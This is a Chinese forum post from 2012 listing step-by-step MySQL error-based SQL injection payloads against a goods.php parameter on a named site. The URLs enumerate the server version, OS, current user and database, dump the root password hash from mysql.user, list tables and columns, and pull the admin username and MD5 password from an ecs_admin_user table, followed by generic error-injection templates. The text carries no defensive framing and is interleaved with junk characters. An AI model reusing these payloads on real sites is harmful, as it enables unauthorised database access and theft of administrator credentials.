找回密码
 立即注册
查看: 2831|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
判断版本号
" z6 w# p7 _+ Z  X) d/ Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) V2 z1 D# u# a2 Q- s" J" L7 u  F; k" J$ L
判断系统
6 b4 A3 x& C( _4 e% |, r- m
. r3 F" q/ A7 f# D: F5 Hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% F! z+ z, z0 h& k; Z  C
$ z7 d  ~- g; r3 U( m4 i( x% e4 I9 I/ f- ]! q
+ I) S) ?  P$ c9 ]0 ?% R6 d: J
当前 user()2 I, U. ^& e3 X# S4 V) Q8 S

9 b: {( h5 P, vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' g: D4 F( E! `; j% b
7 x) N2 k+ `* G
) E" p& E$ f) a1 k; d0 Q, u
0 Y3 a" q5 m* q) }9 D
当前 database()
, Y1 H7 n( I7 ^* k: }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; g0 S  y- M8 U8 O
/ H- C# n3 g) k6 ~
/ t  ]& V4 }+ D5 u0 S( j

+ D5 @6 ?6 j0 r. I3 y. l9 g( W! E$ U7 T! |, R
root hash, d" {3 C! j" y, t) Q1 p% N
$ v" w/ g# F7 z- l! D& q4 k3 A7 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) q  S8 L* E! O8 K
9 P0 h. p1 w# B$ j1 _3 u! p3 G/ j. e" |; b

. F0 l$ N0 n6 G9 _当前 数据库表名
9 C6 v  e, N6 c' Y) W8 ]1 ]
2 h) V* w" A* _. \http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ N5 c* x) d+ f% ]/ V$ K/ t4 s6 u- M+ s* o9 F% G8 j/ `6 x
$ k  X  ]* e1 d
; q- ^. o$ R5 p& c# h0 H2 \
当前 数据库 user_name 字段  n( M% k) O7 }+ i
* z1 y: [; [. e$ Y4 f$ b
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) D. e" h! V. t; M! y$ f

7 b/ M4 I$ O: w/ r& G当前 数据库 字段 password
& U2 }  C1 a$ b( u/ L1 Nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& g- b% d  u- S0 w4 M
, c: N  k& Y& ]8 b6 W, s' t
( G/ l. i- \5 c' F! w9 f" ~: B- {0 L
& E( C1 Q1 W7 s6 `5 N获得 admin passwd(md5)
1 ^2 s& m" k+ O7 f& e9 |& l+ M6 g1 Q; \- z
6 `4 z& [# Z. I: w
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
7 a0 s: x" C! W" y' B& J. |; l2 W
报错注射
5 x% u7 J7 ^3 r* HSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)& X! ?" @  r4 j3 C0 I

$ p8 M9 A+ G0 x5 k; uSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)! L+ E7 w  J5 a* o' _9 d$ x$ w
% ?6 @6 m. @1 W
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表